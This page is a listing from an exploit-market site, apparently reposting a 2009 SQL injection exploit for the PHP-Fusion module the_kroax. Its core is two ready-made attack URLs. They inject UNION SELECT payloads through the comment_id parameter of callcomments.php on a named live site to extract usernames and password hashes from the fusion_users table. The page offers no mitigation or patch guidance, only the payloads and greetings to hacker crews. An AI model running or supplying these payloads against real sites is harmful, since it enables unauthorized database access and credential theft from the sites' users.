[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability

Author
FasTWORM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4637
Category
web applications
Date add
11-01-2009
Platform
unsorted
=================================================================
PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
=================================================================


PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Author by : FasTWORM
[+]exploit:
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/*
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/*
 
----------------------------------------------------------------------------------------------------------------------
[+]Greetz : BackDooR , Tr-ShaRk , All CW Users
[+]Note   : Bugun Dogum Gunum :)
----------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-11-15]  #